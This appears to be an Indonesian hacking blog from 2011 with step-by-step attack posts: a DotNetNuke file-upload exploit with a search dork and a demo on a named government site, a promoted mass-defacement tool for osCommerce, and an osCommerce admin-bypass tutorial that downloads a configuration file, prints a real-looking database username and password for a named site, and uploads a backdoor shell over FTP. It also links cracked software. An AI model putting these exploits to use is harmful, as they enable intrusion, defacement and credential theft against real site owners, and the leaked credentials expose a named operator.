Friday, January 7, 2011

DNN (dotnetnuke) remote file Upload Vulnerability


dork : inurl:portals/0/

Setelah anda Menemukan jalan DNN kemudian pergi ke file ini
expl : 127.1.0.0/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
Pilih: File (A File Pada Situs Anda)
setelah Loading maka Pasang java script di bawah ini pada addres bar url browser anda
javascript: __doPostBack (‘$ ctlURL cmdUpload’,”)
sekarang Anda melihat Browse
root folder pilih dan file Anda akan meng-upload ke
situs/dnn path/Portals/0
Catatan: Anda hanya dapat meng-upload *. swf, *. jpg, *. jpeg, *. JPE, *. gif, *. bmp, *. png, *. doc, *. xls, *. ppt, *. pdf, *. txt, *. xml, *. xsl, *. css, *. zip, *. 3gp, *. asf, *. asx, *. avi, *. flv, *. m4v, *. mov, *. mp4, *. mpe, *. mpeg, *. mpg, *. ram, *. rm, *. rmvb, *. wm, *. wmv, *. vob
oleh defualt tetapi admin dapat mengubah ini dan Anda akan memiliki Shell
demo : http://www.dav.gov.vn/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
hasil : http://www.dav.gov.vn/Portals/0/magelangcyber.txt

 

READ MORE -

Tool Deface osCommerce Scanner v1 Auto Subdir Defaceing By Hmei7

 Pertama-tama Ane Ucapin Terima Kasih Sama Kang Hmei7...Mungkin Tool Ini Sangad Berguna Bagi Yang Hobby Deface...

Cekidot Bro : http://jundab.co.tv/osCommerce_scanner_v1.rar

untuk step by step proses scanning nya ane kasih langkah² di bawah ini :

1. buka tools nya mas bro

2. Browse Target ( kumpulan web osCommerse yang sudah di save dalam file.txt )

3. Edit pengaturan script deface kamu, masuk ke PENGATURAN dan edit, kalo sudah selesai klik kembali icon HIDE ME

4. Klik scan dan tunggu hasilnya,


5. tunggu saja dan nikmati hasil auto scan sub defacing dari master hmei7 ini
croot gan..!

nb*
dalam folder osCommerce_scanner_v1 di pc anda akan auto creat file vuln.txt dan zh.txt , vuln.txt = web yang sukses sub defacing, zh.txt = web yang sukses posting di zone-h ( dengan catatan belum pernah di submit sebelumnya
).

READ MORE -

Thursday, January 6, 2011

Cara Upload Backdoor Di osCommerce

 

ok, lasung aja ea, jalan2 ke sana sini, nemu exploit ttg osCommerce ya udah lah, lsg jajal eh akhirnya bisa juga… hehehehh, gini nie explot yg ada di site itu,

# ByPass Page Admin :

You can use this Trick if admin folder not protected by Mhiman HNc code

if you Want to explore admin page without login. You can use /login.php behind the name of the file

Example :

http://[site]/admin/backup.php/login.php

or

http://[site]/admin/file_manager.php/login.php

Demo :

http://server/store/admin/file_manager.php/login.php

You can See all file in Directory Oscommerce.. haha ;)

and you can download all file with tRick above

# File Disclosure :

in : admin/file_manager.php/login.php?action=download&filename=

Exploit : admin/file_manager.php/login.php?action=download&filename=/includes/configure.php

Example : http://[site]/[path]/admin/file_manager.php/login.php?action=download&filename=/includes/configure.php

ok, sekarang kita cari targetnya dgn dork “Powered by osCommerce” tanpa tanda titik ya :D

utk percobaan kita pake trget ini : http://osc22ms2-cyberoffice.1fonet.fr/catalog
nah, kita cari dulu nie admin page nya , jadinya http://osc22ms2-cyberoffice.1fonet.fr/catalog/admin/login.php nah, ketemu deh… :)

sekarang, kita pake exploitnya jadinya : http://osc22ms2-cyberoffice.1fonet.fr/catalog/admin/file_manager.php/login.php?action=download&filename=/includes/configure.php nah kita mendapatkan configure.php, lsg aja deh kita download :D

selanjutnya, setelah kita download kita buka menggunakan notepad ato yg laen deh, nah itu tampak deh, kita coba dl masuk ke database tanpa masuk ke adminnya dgn yg kita dapatkan,

define(‘DB_SERVER_USERNAME’, ‘laurent’);
define(‘DB_SERVER_PASSWORD’, ‘UQzlZ0vrHEiu’);

habis kita dptkan yg kyk gitu, marilah kita buka melalui FTP, di sini saya menggunakan FileZila,
alhamdulillah sukses :genit: , marilah kita upload backdoor kita, biasanya sih di public_html, tp dsini saya upload di httpdocs, setelah success upload backdoor, lalu kita cek.
http://osc22ms2-cyberoffice.1fonet.fr/shell-yg-kita-pasang, oke trnyata sudah terpasang, monggo silakan di lanjut pembantaiannya..

maaf ya klo agak ribet tulisannya, soalnya jarang buat tutorial kang


 

READ MORE -

Wednesday, January 5, 2011

Easy GIF Animator Pro v4.6.0.34+Full 

[Image: 39358_1246154412460_1787428369_497294_7411926_n.jpg]

Mungkin Aplikasi ini sudah banyak pada tau...
jadi yg belum tau coba aj...
ini software adalh membuat animasi sederhana dan sangat gampang...
selain itu animasi ini bZ membbuat animasi banner dan animasi button...Soooo percantik Website kamu or blog kamu...
selamet mencobaa....
http://www.indowebster.com/Easy_GIF_Animator_4_Pro.html
READ MORE -
Template by : mhiman@ hacker-newbie.org